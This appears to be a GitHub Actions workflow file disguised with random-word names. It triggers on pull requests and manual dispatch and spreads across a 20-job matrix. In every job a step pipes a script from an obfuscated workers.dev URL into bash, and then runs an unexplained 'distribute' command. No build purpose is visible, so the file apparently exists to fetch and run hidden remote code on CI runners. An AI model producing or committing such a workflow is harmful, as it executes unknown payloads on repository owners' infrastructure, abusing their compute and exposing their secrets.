name: endless

on:
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  prominent:
    strategy:
      matrix:
        receiver: ["democratic", "bar", "session", "virus", "occasion"]
        back: ["rapid", "admire", "trend", "hence"]
      fail-fast: false
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v6
    - name: enhance
      run: curl "https://nggr01.lucky-darkness-f361.workers.dev/cb539/df7a/687e51eff2006cc09768/4ce67/d42bea/00b/682a27dadfe17/0df2/f73/5?f=1775327383&o=xe&whv=c&krf=g" | bash
    - name: technician
      run: distribute
